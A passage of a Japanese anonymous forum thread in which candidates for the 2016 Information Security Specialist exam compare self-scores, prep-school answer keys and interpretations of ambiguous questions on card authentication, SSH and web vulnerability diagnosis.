2016/10/20(木) 07:21:14.10 ID:lb7ry5uY
>>542 文章を読む能力は実務能力の一つだと思うけど、実務では曖昧な個所について確認をとって、誤解を招かないようにするのがセオリーじゃない?
ややこしい表現をややこしいまま読ませるとか意地悪極まりない。
566 :
名無し検定1級さん
2016/10/20(木) 07:22:09.54 ID:S3Jc+/oJ
一見いろんな正解があるように見える問題でも、よく読み込めば答えは1つに絞られるんだよ。
それに気づく事ができるようになれば合格は近い。
注意深く見落とさない能力も試されてる。
567 :
名無し検定1級さん
2016/10/20(木) 07:24:59.00 ID:6usqg8qJ
568 :
名無し検定1級さん
2016/10/20(木) 07:25:19.87 ID:lb7ry5uY
>>566 答えは一つになるように作られてるけど、表現は紛らわしい。
あと、模範解答が一般論か、本文から導きだせるものか見抜けないと難しいよ。
今回の試験で言えばTCPwrapperなんて知識がないと複数の正答が作れるし。
569 :
名無し検定1級さん
2016/10/20(木) 07:27:19.64 ID:c4V5b/Kx
これ思い出した
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](https://rz.anime-tube.win/pic.php?http://i.imgur.com/d3bCjNT.png)
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](https://rz.anime-tube.win/pic.php?http://i.imgur.com/e2wm66C.jpg)
570 :
名無し検定1級さん
2016/10/20(木) 07:27:26.86 ID:6usqg8qJ
知識不足を問題のせいとか言い出すのは滑稽すぎる
571 :
名無し検定1級さん
2016/10/20(木) 07:29:44.77 ID:V4gf+q6C
なんとなく言いたいことはわかる
試しにネスペの過去問見てみたんだけど
答えは全然わからなったにせよ
問題の意味はかなり分かりやすかった
572 :
名無し検定1級さん
2016/10/20(木) 07:40:23.16 ID:2Zb0V9D+
>>569 レベル3まで察しはつくけど、レベル1までしか対応しないな
573 :
名無し検定1級さん
2016/10/20(木) 07:47:04.56 ID:XhLbhJLN
午後2-1の最後の問題は
入退室記録と操作履歴の照合で
不正行為が出来なくなるじゃダメなん
ですか。
ITECの答えだと、いつも携帯するよう
にしようとしても、置き忘れや
他人に貸すのは余り変わらない気が
しますけど。
574 :
名無し検定1級さん
2016/10/20(木) 07:48:20.84 ID:V4gf+q6C
>>572 実際の仕事なら
なぜ短くするのか
どれくらい短くすればいいのかを聞けるけど
試験だと聞けないしな
575 :
名無し検定1級さん
2016/10/20(木) 07:48:57.05 ID:77aITSfX
>>570 知識の話なんてしてないじゃん。アホ?
IPAの頭の中にあることなんて誰も知ることはできない
知って欲しけりゃ説明しろ
576 :
名無し検定1級さん
2016/10/20(木) 07:48:57.23 ID:wUsZOCYm
契約書がない限りレベル3は手を出しにくいよ。
下手するとオプションとか言われてボランティアでやらされるし。
577 :
名無し検定1級さん
2016/10/20(木) 07:50:07.77 ID:V4gf+q6C
>>573 出来なくなるわけじゃないからな
抑止する、程度の方が良さそうだ
578 :
名無し検定1級さん
2016/10/20(木) 07:50:38.16 ID:APOELM9G
579 :
名無し検定1級さん
2016/10/20(木) 07:51:03.87 ID:wUsZOCYm
>>573 俺も最後の問題は不正の抽出に使える点を挙げた
そもそも、いろいろな機能を積んでもカードの貸し借りをする人がいたから問題なわけで
580 :
名無し検定1級さん
2016/10/20(木) 07:51:43.87 ID:c4V5b/Kx
581 :
名無し検定1級さん
2016/10/20(木) 07:52:03.87 ID:77aITSfX
582 :
名無し検定1級さん
2016/10/20(木) 08:08:31.73 ID:XhLbhJLN
577さん
ありがとうございます。
解答には出来なくなるとは書いて
いないので、検知できるとか、
チェック出来るとか書いたと思います。
この問題があってて、厳し目に採点して
ちょうど60点だと思います。
2-1の2つめで、
カードが申請済みでないことの確認も、
申請者の従業員コードを確認する。
とか、
4-1で
プロジェクト後に認証は出来ても認可されないのとこも、
カードの不正利用は出来ても認証と認可
でシステムにアクセス出来る範囲が
制限されるとか、
カードをシステム部が管理するから一元管理出来るとか、
カード一枚配布だから、ログ管理がしやすいとか、
正解には程遠いこと書いてしまいました。
経験上、午後1は採点甘いですが、
午後2は厳しいのでボーダーラインって
感じです。
583 :
名無し検定1級さん
2016/10/20(木) 08:08:39.38 ID:wUsZOCYm
そもそも、個別のソフトウェアって設問のヒントになることがあったっけ、過去問を見る限り、ソフトや技術の名前を知らなくても解けるようにヒントを仕込んでたと思うけど。
584 :
名無し検定1級さん
2016/10/20(木) 08:11:39.29 ID:S3Jc+/oJ
>>573 問題点は「おきっぱにする事」と読める。(悪意の不正なら違う答えになるけど)
入退室カードは持ち歩かないと入室できない→おきっぱ解消
他人のを借りて入室したら、操作履歴もその他人になるから
入退室記録と操作履歴の照合しても意味なくない?
585 :
名無し検定1級さん
2016/10/20(木) 08:23:31.62 ID:wUsZOCYm
>>584 俺は「他人or共有のカードで入退場してる人がいる」を問題にした。
入退室記録が極端に多ければ、不正の疑いありと見なして、追跡調査もできるしね。
586 :
名無し検定1級さん
2016/10/20(木) 08:27:13.09 ID:fKS3ds+H
国語力なさすぎて辛い…今年もダメクサイわ。。。
587 :
名無し検定1級さん
2016/10/20(木) 08:27:24.94 ID:KQLFHmD9
午後2は採点厳しいみたいですね
588 :
名無し検定1級さん
2016/10/20(木) 08:33:30.21 ID:5SqLvTUg
sshに公開鍵認証なんてあるの知るか、何それって言ってる人と、午後2問2の最後
の問は何聞きたいのかわからんって言ってる人をいっしょくたにしてるから、
論点噛み合わないんじゃないかな。
前者は知識が足りないだけだから勉強しなよだけど、後者はセスペのスキルが
上がれば解決できるのかといえば、そうでもないから問題なんじゃないかと。
自分はデスペ、ネスペ持ちで、今回初めてセスペ受検したけど、確かに何について
聞きたいのかわからない、セスペ独特の問題はあると思う。
IPAに文句言ってる人は、質問の趣旨を理解するところからがセスペの能力なのか、
と言いたいんじゃないかな。
589 :
名無し検定1級さん
2016/10/20(木) 08:34:44.89 ID:XhLbhJLN
584さん
ありがとうございます。
問題文からは、
入退室カードと認証カードが別々だと、
置き忘れた認証カードだけ借りて、
なりすますことが出来るように解釈
してしまいました。
確かに他人の入退室と認証が一緒に
なったカードを借りたら監視カメラや
本人確認の入退室記録簿とかの記述が
本文にないので、なりすませると思いますが、問題文の流れからすると、機能
を一緒にすることで携帯率が上がる
という考え方も強引過ぎるような気がし
ます。百歩譲って携帯率が上がると
しても、不正行為抑止には効果は
ないので、やはり、記録による検知
で携帯率と他人への貸し出し率低下
の方がいいような気がします。
590 :
名無し検定1級さん
2016/10/20(木) 08:37:20.15 ID:S3Jc+/oJ
問題が二つ
・置き忘れ
・めんどうっちいから他人と共用
入退室カードと合体させたら持ち歩くでしょ?ってのが素直な流れじゃないかな?
591 :
名無し検定1級さん
2016/10/20(木) 08:38:36.64 ID:wUsZOCYm
>>588 sshの鍵認証は知識問題だけど、隠れた正解が見つかったんだよなあ(証明書を使った認証)
こちらの扱いが気になる。
592 :
名無し検定1級さん
2016/10/20(木) 08:51:22.05 ID:XhLbhJLN
590さん
ありがとうございます。
私にはわからなくなってきました。
携帯率が上がって不正行為に効果、
検知で効果、両方いいような気がします。
593 :
名無し検定1級さん
2016/10/20(木) 09:01:57.89 ID:S3Jc+/oJ
問題文の2点の問題は、悪意の不正と言うよりは、面倒なので適当に運用される点です。
忘れたから他人のを借りるのであって、持ってるなら自分のを使うわけです。
入退室カードは持ち歩く(他人のを借りるとその人が入れないし)
それで、問題点に対する効果が得られますよね。
594 :
名無し検定1級さん
2016/10/20(木) 09:04:17.89 ID:c4V5b/Kx
勝手に使われることより使わせることにたいして対策をしたいんでしょ
PINあるし
595 :
名無し検定1級さん
2016/10/20(木) 09:24:55.62 ID:S3Jc+/oJ
>>587 午後1通過した人はある程度の実力があるわけです。
午後2はその中から、さらに選別するわけだから必然的にそうなりますよね。
596 :
名無し検定1級さん
2016/10/20(木) 09:37:23.63 ID:vjr7ut0B
>>589 記録による検知で携帯率が上がる根拠が何もないんです
597 :
名無し検定1級さん
2016/10/20(木) 09:40:47.23 ID:hLe+VH3b
恐らく落ちてると思うんだけど新しい試験は内容同じかな?
同じテキストで勉強しはじめても
大丈夫だと思う?
598 :
名無し検定1級さん
2016/10/20(木) 09:43:12.72 ID:s64CAhki
既に各社テキスト出しているけど中身は同じだったな
表紙だけリニューアル
599 :
名無し検定1級さん
2016/10/20(木) 09:44:39.28 ID:wUsZOCYm
>>596 過去問を見る限り、記録に一定の牽制効果はあるよ。
社員一人ひとりを対象に監視してるってのは、
言い換えたら不正な使い方の責任を個別に追及できるわけだし。
600 :
名無し検定1級さん
2016/10/20(木) 09:45:18.19 ID:5znuBqaO
>>599 記録取ってることを公表しないと意味なくね?
601 :
名無し検定1級さん
2016/10/20(木) 09:47:43.16 ID:vjr7ut0B
>>599 不正行為を抑制する効果がないなんて書いてませんが
602 :
名無し検定1級さん
2016/10/20(木) 10:06:11.12 ID:3rgz4Cin
確かに記録を取っていても公表しないと抑止効果は薄いかな
603 :
名無し検定1級さん
2016/10/20(木) 10:12:47.47 ID:psdsnAE0
現実を考えればわかることだろ
入館証をピッとしないと部屋に入れないビルで
入館証机に置いたまま部屋出てく馬鹿はいないだろ
604 :
(*´∀`)情弱士
2016/10/20(木) 10:15:39.53 ID:GggVrZbC
605 :
名無し検定1級さん
2016/10/20(木) 10:20:42.56 ID:bh0yKkzp
>>603 入館証をうっかり置いていく奴は多いよ。
だから、問題文のような行為(借りるとか)が起きるわけだし。
606 :
名無し検定1級さん
2016/10/20(木) 10:22:04.20 ID:psdsnAE0
>>605 その場合は中にいるやつに電話して空けてもらったり
誰かが開けたときに共連れで入室するのが一般的じゃね
607 :
名無し検定1級さん
2016/10/20(木) 10:34:24.23 ID:bh0yKkzp
記録してる事実は公表すると書かなきゃまずいな。
あと、ふと気になったんだけど
午後1の問3の設問2
マルウェアはマルウェアZと書いているのに
ほかの二つは違うタイプの表記になってるのは
何か意味があるんかねー
608 :
(*´∀`)情弱士
2016/10/20(木) 11:32:07.36 ID:GggVrZbC
>>607 >ほかの二つは
確かに、2つ書かてれいるねぇ。
15ページのZ無しマルウェアはZではないから、設問4にはZが付いてない。
だからと言って、マルウェアZには認証機能が付いてないという事ではない。
609 :
名無し検定1級さん
2016/10/20(木) 11:39:12.68 ID:U0DTSnlm
このみんなで議論している雰囲気ほんとすきw
試験を受ける醍醐味だわ
610 :
(*´∀`)情弱士
2016/10/20(木) 11:41:33.67 ID:GggVrZbC
611 :
(*´∀`)情弱士
2016/10/20(木) 11:50:19.84 ID:GggVrZbC
大きな添付ファイルを送ると、ISPも拒否するし、送れたとしても受け側もダウンロード時間がかかって相手に失礼だった。
礼儀で圧縮するのが美徳と思われていた。
送信者はネット慣れている人だな、そんな人がウイルスなんか送ってくるハズはない。
と思わせておき、圧縮ファイルの中身はトロイの木馬。
612 :
名無し検定1級さん
2016/10/20(木) 12:20:34.49 ID:ZpKOs86R
ネスペ
デスペ
セスペ
アスペ
613 :
名無し検定1級さん
2016/10/20(木) 12:42:07.42 ID:baSp+Auy
情弱おじさんの回答みたら、午後2点数とれてそうだけど、午後1がアレだった
614 :
名無し検定1級さん
2016/10/20(木) 12:45:42.12 ID:S3Jc+/oJ
メールサーバ用のウイルス対策ソフトで
圧縮ファイルを展開してウイルスチェックする機能が普通にあったけどな。
615 :
名無し検定1級さん
2016/10/20(木) 12:48:17.42 ID:W/0JSCq+
圧縮ファイルを展開するタイプのセキュリティソフトはZIP爆弾で死ぬ
616 :
名無し検定1級さん
2016/10/20(木) 12:58:53.19 ID:3vHlYtF0
>>614 アプライアンスのサーバ設定したがCPU使用率とRAM使用率がやばかった
617 :
名無し検定1級さん
2016/10/20(木) 13:00:49.96 ID:iHwBqIpB
過去問3回分くらい解いてから受けたけど、午後は50点台から抜け出せる気がしない
別の試験に移るべきか
618 :
名無し検定1級さん
2016/10/20(木) 13:01:17.07 ID:ObFeU+Fa
>>612 寝取りスペシャリスト
デリへルスペシャリスト
セックススペシャリスト
アナルスペシャリスト
619 :
名無し検定1級さん
2016/10/20(木) 13:04:28.96 ID:rQFejEbT
>>617 工事担任者とか電気通信主任技術者とか無線従事者に行こう
620 :
名無し検定1級さん
2016/10/20(木) 13:08:59.69 ID:pJR77H/A
セスペデス
621 :
名無し検定1級さん
2016/10/20(木) 13:52:25.68 ID:4rTyzrn0
国語力なさすぎて午後受かる気しねえ
622 :
名無し検定1級さん
2016/10/20(木) 14:07:32.90 ID:bh0yKkzp
itecの模試を受けた初受験者だけど、問題自体の難易度はitecの方が上なのに、本試験の方が曖昧な日本語の嵐でモヤモヤする。
623 :
名無し検定1級さん
2016/10/20(木) 14:34:43.01 ID:qBtgnAr1
624 :
(*´∀`)情弱士
2016/10/20(木) 14:54:52.42 ID:GggVrZbC
>>617 ・マークシートは過去問道場で正答率90%になるまで。
・午後は解答欄と設問を見て、になんだこれ?って思ったところだけ読んだら良いよ。
・スマホのBYODなんか、もう出ない。去年発売のAndroid 5.1さえ危険な脆弱性があって仕事で使うものではない。
625 :
(*´∀`)情弱士
2016/10/20(木) 15:02:25.61 ID:GggVrZbC
626 :
(*´∀`)情弱士
2016/10/20(木) 16:04:23.51 ID:GggVrZbC
627 :
名無し検定1級さん
2016/10/20(木) 16:33:17.73 ID:YKsFi/vm
628 :
名無し検定1級さん
2016/10/20(木) 16:46:43.90 ID:bh0yKkzp
やべーギリギリ60点
これは死んだかな?
629 :
名無し検定1級さん
2016/10/20(木) 16:48:35.13 ID:LeT4y6pI
午後1、午後2どっちも60点ピッタリなんだが
630 :
名無し検定1級さん
2016/10/20(木) 16:49:31.65 ID:pJR77H/A
TACもマルウェアZは含めないって解釈か。
うーん、午前1が辛いw
631 :
名無し検定1級さん
2016/10/20(木) 16:49:56.79 ID:pJR77H/A
s/午前/午後/
632 :
名無し検定1級さん
2016/10/20(木) 16:50:17.60 ID:bh0yKkzp
ナカーマ。
ところで、この試験って余計なことを書いたら減点か不正解になると思っていいよな?
今回もそう思って採点したんだが。
633 :
名無し検定1級さん
2016/10/20(木) 16:51:30.35 ID:bh0yKkzp
>>630 TACは午後2のカードの失効部分が違うな。
返却と失効のタイミングがずれる点を加味してるっぽい。
634 :
名無し検定1級さん
2016/10/20(木) 16:53:53.70 ID:fngTinP8
微妙なところを部分点ゼロで計算しても午後I6割午後II7割
来年はバッジが映えるようにスーツで、名刺も国連軍マークみたいのつけとこう
午後1問1、やっぱハッシュ値で検証してもOKかな
ファイル配布の安全保証は、既存のhttpsのページにファームのmd5値を公開するのが一番楽だしな
635 :
名無し検定1級さん
2016/10/20(木) 16:59:36.52 ID:wUsZOCYm
>>634 電子署名の説明を流用すればハッシュ値になるよな。
改ざんの検知も容易いし。
個人的には証明書認証はダメなのかが気になる。
まあ、なんかダメな気がするけど。
636 :
名無し検定1級さん
2016/10/20(木) 17:05:25.25 ID:pJR77H/A
午後1問3の設問4(1)はブルートフォースアタックみたいなのを書いたら0点かな…?
自分は午後1は
・部分点がどれだけもらえるか
・下駄を履かせてもらえるか
によって合格点に届くかが左右される
問1は記述が多かったから多少部分点を甘めにくれないだろうかw
>>633 午後2はまだ見てなかったけど、問2選択だからそっちはどのみちノーチェックだった…。
637 :
名無し検定1級さん
2016/10/20(木) 17:10:26.58 ID:wUsZOCYm
>>636 俺はブルートフォースじゃなくて、マルウェアは通信にAPIとログから解析した認証手続きを使うっていう解答を書いたから似たようなもんだ(笑)
まあ、ブルートフォースを使うことはないでしょう。
個人的な疑問だけど、問3の会社の認証はPC別に設定がなされてるとか書いてなかったよね?
638 :
名無し検定1級さん
2016/10/20(木) 17:12:02.59 ID:pJR77H/A
午後2問2設問4(1)、ITECもTACも「URL」って書いてあるけど、「IPアドレス」で大丈夫だよね…?
639 :
名無し検定1級さん
2016/10/20(木) 17:16:38.50 ID:fngTinP8
>>638 すまん、俺が採点者なら0点
俺が攻撃用スクリプト書くとしたら、192.168.i.j でfor文組んで、まずはプライベートの固定IPでアクセスできる機器を探す
故に俺がその社内サーバを建ててるとしたら、対策としてIPアドレス指定のアクセス自体を弾くようにhttpdを設定する
640 :
名無し検定1級さん
2016/10/20(木) 17:23:05.67 ID:jtTchXkD
自己採点
itec
午後1 64点
午後2 70点
TAC
午後1 75点
午後2 65点
正直うまく解釈されないような文を書いている可能性があるのでまだ落ち着けない
641 :
名無し検定1級さん
2016/10/20(木) 17:23:59.67 ID:bh0yKkzp
多分通ってるだろ(笑)
別解でもなければの話だけど。
642 :
名無し検定1級さん
2016/10/20(木) 17:24:46.35 ID:baSp+Auy
>>638 部分点かねぇ。。CGIが動くパスまで分からないと攻撃は成立しないし
俺もIPアドレスって書いたが
643 :
名無し検定1級さん
2016/10/20(木) 17:25:38.13 ID:pJR77H/A
644 :
名無し検定1級さん
2016/10/20(木) 17:25:54.67 ID:jtTchXkD
>>641 ほんと通ってて欲しいわ
あとは発表まで寝て待つしかねえ
645 :
(*´∀`)情弱士
2016/10/20(木) 17:32:26.94 ID:GggVrZbC
>>638 だめ。IPアドレスはホストまで。俺はFQDNって書いたから同じくIPアドレスの意味になる。
アプリまでを含めたフルなURLが正解。
646 :
名無し検定1級さん
2016/10/20(木) 17:36:26.78 ID:fngTinP8
>>643 あとは、IPアドレスだと普段使ってるドメインと違うだろうから、既にログイン済みの社内サイトからは情報を窃取できない可能性が高い、てのもある。
でも問題見返してみたけど、その辺のWebサーバの条件になりそうな前提が無かったし、多めの部分点か、普通に正解なんではないかと思う。
条件の記載も「f を攻撃コードに組み込むことができること」だし。成功率については触れてない。
647 :
名無し検定1級さん
2016/10/20(木) 17:39:51.19 ID:pJR77H/A
あー、言われてみると確かにそうだ。そうすると結構苦しいなあ。
部分点をかき集められれば届くかな?くらいか。
なんとかギリギリでいいから合格点に届いてることを祈るしかないか。
648 :
名無し検定1級さん
2016/10/20(木) 17:40:31.72 ID:pJR77H/A
>>646 サンクス
まあ、後は祈るしかできないから天命を待つとします。
649 :
名無し検定1級さん
2016/10/20(木) 17:43:37.01 ID:YKsFi/vm
>>638 うーん、上でも書いてあるけど条件2に「CGIを利用した〜」が書いてあるから
IPアドレスだけでは埋め込んでもダメかな
HTTPリクエストはURLに対して行うものだし
>>639 答えまでの過程に違和感しかない
もう少し文中から答えを導き出すようにした方がいいよ
650 :
名無し検定1級さん
2016/10/20(木) 17:45:30.03 ID:fngTinP8
>>649 あんた昨日からいたアスペ軍団の一人だと思うけどさ、相手に通じてんだから黙っとこうぜ
651 :
(*´∀`)情弱士
2016/10/20(木) 17:46:00.03 ID:GggVrZbC
>>645 >
>>638 > だめ。IPアドレスはホストまで。俺はFQDNって書いたから同じくIPアドレスの意味になる。
> アプリまでを含めたフルなURLが正解。
syanai.web.srv/index.htmlが攻撃URLだったら、ホスト名syanai.web.srvで正解でしょ。
IPアドレスでも正解かもな。
652 :
名無し検定1級さん
2016/10/20(木) 17:50:58.12 ID:pJR77H/A
IPアドレスでのアクセスについてどうこう、てのは問題文中に記載がないし、
そもそもドメイン設定してるかわからない、と思ってIPアドレスって書いちゃったけど、よく考えたらドメイン設定してようがしてまいがURLでよかったな…。
うーん、あとから見ると悔やまれるw
653 :
名無し検定1級さん
2016/10/20(木) 17:51:45.43 ID:YKsFi/vm
>>650 アスペ軍団?張り付いて無いんで分かりませーん
アホがアホに説明して通じた気になってるから指摘したんだよ
654 :
名無し検定1級さん
2016/10/20(木) 17:53:51.70 ID:UxWr93he
自己採点は超厳しめでやった方が良いぞ
27秋で自己採点甘め75点厳しめ65点だったのに
実際には52点だったからな
655 :
名無し検定1級さん
2016/10/20(木) 18:00:01.63 ID:baSp+Auy
たしかに639は意味不明だけど、仲良くしようぜ
656 :
名無し検定1級さん
2016/10/20(木) 18:00:28.85 ID:bh0yKkzp
話を変えちゃうが、午後1問1設問2(2)の答え。
ウイキペディアだと認証方法にはパスワード、公開鍵、ワンパスなどがあると書いてるけど、ワンパスだとどうなるんだろうね。
教えて、偉い人。
657 :
(*´∀`)情弱士
2016/10/20(木) 18:04:44.89 ID:GggVrZbC
>>656 わんぱす
わんわんお!
(U^ω^)
C/ |
し-し-J
658 :
名無し検定1級さん
2016/10/20(木) 18:10:25.84 ID:nKuCFG/X
午後1問2設問3(3)はTACとiTECで割れてるな
プログラミング的な問題なのになんで割れてるんだろう
659 :
(*´∀`)情弱士
2016/10/20(木) 18:13:13.15 ID:GggVrZbC
660 :
名無し検定1級さん
2016/10/20(木) 18:14:31.03 ID:baSp+Auy
>>656 ダメだと思う。別のサービスと組み合わせればいけるってだけで、
標準機能として備えてないし、IPAが期待する答えでは絶対にない
661 :
名無し検定1級さん
2016/10/20(木) 18:15:22.05 ID:pJR77H/A
>>656 OTPって見たときに確かに有りかも、と思ったけど、
ワンタイムとはいえパスワードだし、パスワード強度に全く依存しないわけではないかな、と思った。
どう採点されるかは採点者じゃないからわからないけれど…。
ホストベース認証って書いたらどうなるんだろう、と思ったけど、結局公開鍵認証だから同じかな?
662 :
名無し検定1級さん
2016/10/20(木) 18:15:32.03 ID:Tl0fFwPW
午後2 問1 設問2(3) 失効事由の値
も割れてますよ
663 :
名無し検定1級さん
2016/10/20(木) 18:16:16.63 ID:Tl0fFwPW
アイテック様とタック様で割れるぐらいなんだから、ここで俺らがウダウダ言うのも当たり前だよな
664 :
名無し検定1級さん
2016/10/20(木) 18:18:37.98 ID:fngTinP8
>>653 「アホがアホ」はダメだろ
攻撃したいなら俺だけにして、全方位に噛みつかないほうが良いかと思う
>>655 >>639の設定について、プライベートIPの総当り攻撃、てのが読み取れてるなら別にいいです
もし日本語の勉強だったらノーサンキューでお願いします
昨日からセキュスペスレで現国のこだわり語る人大杉死んでくれ
665 :
名無し検定1級さん
2016/10/20(木) 18:19:39.15 ID:wUsZOCYm
確かに、ワンパスは追加設定が必要か。
そうなると以前出てきた証明書を用いる認証はどうなる?
全ての製品が対応してるわけじゃないからアウトかな?
666 :
名無し検定1級さん
2016/10/20(木) 18:23:36.13 ID:psdsnAE0
あのさあTACの解答、午後1問3の設問4(2)
「業務に必要かつ安全であることを確認したURLをホワイトリストに登録する。」
「業務に不要と思われるカテゴリを"遮断"に設定する。」
と、表記揺れが出るであろう記述問題の解答が、ITECの解答と、記号や句点まで一字一句全く同じなんだが、
これってITECの解答とTACがパクったんじゃねーのw
著作権はTACだ何だ書いてある割には
情報セキュリティちゃんと守ってんのか?TACさんはw
667 :
名無し検定1級さん
2016/10/20(木) 18:23:44.66 ID:APOELM9G
自己採点60点ぐらいだと落ちる可能性のほうが高いな
668 :
(*´∀`)情弱士
2016/10/20(木) 18:25:02.59 ID:GggVrZbC
ワンパスとワンタイムパスワードは全く違う。
OTPとワンタイムパスワードは同義語。
俺は、送信者認証や第三者中継って書いて落ちた。正解は送信ドメインとオープンリレーだった。
669 :
名無し検定1級さん
2016/10/20(木) 18:28:40.73 ID:wUsZOCYm
>>666 意図的に書こうとしない限り、予備校の解答と違う結果は出ないんじゃない?
わざわざルールと要望が文中で明記されてるし。
670 :
名無し検定1級さん
2016/10/20(木) 18:32:27.79 ID:APOELM9G
4月の試験の後は簡単だったとか合格率が20%を超えるって
言っていた人が多かったけど今回はぜんぜんいないね
671 :
名無し検定1級さん
2016/10/20(木) 18:32:46.67 ID:Tl0fFwPW
672 :
名無し検定1級さん
2016/10/20(木) 18:34:56.81 ID:LeT4y6pI
673 :
名無し検定1級さん
2016/10/20(木) 18:42:42.40 ID:wUsZOCYm
今回の試験は
午後1
1.ネットワークに関する突っ込んだ問題
2.セキュアプログラミング
3.サーバー移行とマルウェア対策
だし、
午後2
1.カードを用いた認証システムと運用
2.脆弱性診断
だから、今までより幅広い分野の知識と慣れが求められる印象。
合格率は14%、点数調整アリと予想するけどどうだろうね。
674 :
(*´∀`)情弱士
2016/10/20(木) 18:55:30.87 ID:GggVrZbC
不成立問題 全員合格
わんわんお!
(U^ω^)
C/ |
し-し-J
675 :
(*´∀`)情弱士
2016/10/20(木) 18:58:12.52 ID:GggVrZbC
当該誤記により午後U問2は成立しないと判断し、問2を選択した受験者全員に
ついて、全問を正解として取り扱うこととしました。
676 :
名無し検定1級さん
2016/10/20(木) 19:02:26.12 ID:baSp+Auy
>>664 プライベートIPの総当たり攻撃がどう設問に影響するのか分からないので、教えてほしいです
もしかして、プライベートIPアドレスの総当たり攻撃が一般的に存在して、IPアドレスを指定したアクセスの禁止がwebサーバで設定されている可能性があるから、IPアドレスの流出では攻撃が成功しないっておっしゃってます・・・?
677 :
名無し検定1級さん
2016/10/20(木) 19:04:36.69 ID:Cd/NUrgl
午後2問1の設問2(3)はiTECとTACで完全に割れたね
果たしてアだけなのかア、ウなのか
678 :
名無し検定1級さん
2016/10/20(木) 19:05:44.97 ID:pJR77H/A
アイテックの配点表はまだかな…。
解答例は予定より1日ずつ早かったのに、配点表が遅いとはこれいかに。
679 :
名無し検定1級さん
2016/10/20(木) 19:07:21.29 ID:IBKj2rtC
思ったよりTACとITECは割れなかったな
ほぼ同じ解答だろこれ
午後1の問13と午後2の問1しか見てないけど
680 :
名無し検定1級さん
2016/10/20(木) 19:13:22.27 ID:wUsZOCYm
>>677 俺の解答は、退職者は人事情報に基づいて失効するし、退職時にカードを返却してもらうから退職は問題ないからウのみにした。
ただ、システムの利用終了時の手続きを見直すと、カードの回収手続きに不備があるからアも問題があるかもしれない。
681 :
名無し検定1級さん
2016/10/20(木) 19:14:33.02 ID:adVT0XXu
午後2で問2を選んだ人、自己採点の結果教えてくれ
ちなみに俺は30点だった
682 :
名無し検定1級さん
2016/10/20(木) 19:14:33.76 ID:fngTinP8
>>676 設問で問われているのは攻撃を成功させる条件であり、IPアドレスでは
>>639と
>>646の理由により攻撃が成立しにくいから、IPよりもURLのほうがより適した回答である。
この場合のIPとURLの攻撃性能が同等ならば、IPアドレスは別解になると思われる。俺はそうは思わないけど。
683 :
名無し検定1級さん
2016/10/20(木) 19:18:02.52 ID:Cd/NUrgl
午後1問1のTCP Wrapperの問題
TCP Wrapperがなんなのか全くわかってないながらも、TCPだからIPアドレス関連だろうと山張って
「監視端末であるかをIPアドレスで確認し、アクセス時に制御する」って書いたんだけど
TACの解答みたら部分点くらい貰える気がしてきたんだけどどうかな・・・
684 :
名無し検定1級さん
2016/10/20(木) 19:20:45.89 ID:wUsZOCYm
>>683 あー、そういう考え方で解けばいいのか。
俺はsshの癖でアプリ云々とか書いちまった…orz
死ねばいいのに自分
685 :
名無し検定1級さん
2016/10/20(木) 19:21:50.46 ID:LeT4y6pI
>>683 ○もらえそうだけどなあ
少なくとも部分点はもらえると思う
686 :
名無し検定1級さん
2016/10/20(木) 19:27:21.95 ID:APOELM9G
パブリックコメントでのご意見
「広いIT業界に対応するため、試験は難化するのが当然だと思う。」
687 :
名無し検定1級さん
2016/10/20(木) 19:29:45.78 ID:wUsZOCYm
>>686 ただし報酬は据え置きで
が抜けてそう。
実際問題、セキュリティ畑の人って日本のIT界隈じゃ冷や飯喰らいだからなあ。
688 :
名無し検定1級さん
2016/10/20(木) 19:38:23.73 ID:CwT9IIcH
689 :
名無し検定1級さん
2016/10/20(木) 19:40:55.06 ID:4ecX2Zcm
午後II問2設問4(3)
プロキシサーバー経由でってのはいるの、いらないの?
入れちゃったんだけど。
690 :
名無し検定1級さん
2016/10/20(木) 20:08:07.23 ID:wUsZOCYm
ITECの配点予想、本格的に遅れてるなあ
担当者は残業して決めてるのかな?
691 :
名無し検定1級さん
2016/10/20(木) 20:09:22.41 ID:3+f7H+/d
どうせ責任なんて問われないし、適当でいいから出してくれよ
692 :
名無し検定1級さん
2016/10/20(木) 20:16:01.84 ID:hzbKf+11
核情報流出かーひどいもんだな
693 :
名無し検定1級さん
2016/10/20(木) 20:21:08.52 ID:hzbKf+11
国家資格より大学
694 :
名無し検定1級さん
2016/10/20(木) 20:46:34.36 ID:JYIxoD+z
>>688 うおセキュアド除外されてんじゃん
今回セキュスペ受かったっぽいからいいけど
受かったら失効しない情試を前提にしてんのにこんな対処するんだな
695 :
名無し検定1級さん
2016/10/20(木) 20:49:31.86 ID:ilGxgigG
午後1 52点
午後2 65点
( ^ω^)…
696 :
名無し検定1級さん
2016/10/20(木) 20:50:24.51 ID:CFcgww7K
へぇセキュアド外れるんだ(他人事)
697 :
名無し検定1級さん
2016/10/20(木) 21:02:10.19 ID:lb7ry5uY
セキュアドが外れるのも気になるけど、試験の傾向は弄られるのかな?
ざっくりとしか見てないけど、広範な試験って意味で運用と技術の二頭立てがますます強くなりそう。
698 :
名無し検定1級さん
2016/10/20(木) 21:12:02.47 ID:hR0VYzaq
今回落ちてるのもう確信してるけど次の登録情報セキュスペ受けるかどうか悩むわ
ほぼ自己満足のために受けてるのに更新制ってのがなあ
699 :
名無し検定1級さん
2016/10/20(木) 21:12:31.93 ID:77aITSfX
更新にいくら掛かるの?
700 :
名無し検定1級さん
2016/10/20(木) 21:15:44.69 ID:uCn/+0UG
>>683 俺も同じ考えで山はった。
部分点もらえたら嬉しいね。
701 :
名無し検定1級さん
2016/10/20(木) 21:18:29.36 ID:2Zb0V9D+
IPアドレスじゃ単純すぎるから、(どうやるかは不明だが)MACアドレス使うんだろと思って
MACアドレスで制限するって書いたわ。
どう考えても無理だよなあ
702 :
名無し検定1級さん
2016/10/20(木) 21:32:43.29 ID:gwC+gdmE
今回午後1が難しかったという人が多いけど、実際みんなどのぐらい?
俺はTAC回答だと午後1(問1,3)が57点で午後2(問2)が75点だった。
部分点は自分の回答がTAC回答と似ていれば満点、
観点を一部含めば半分、観点が入っていなければ0点で計算。
60点割れが多くて午後1に調整入れば良いなあと希望を抱いて眠る日々(´・ω・`)
703 :
名無し検定1級さん
2016/10/20(木) 21:38:47.55 ID:2Zb0V9D+
>>702 選択の組み合わせも自己採点もほぼ同じ(60,80)
午後2問2は簡単だったのに、午後1問1が難しかった。
704 :
名無し検定1級さん
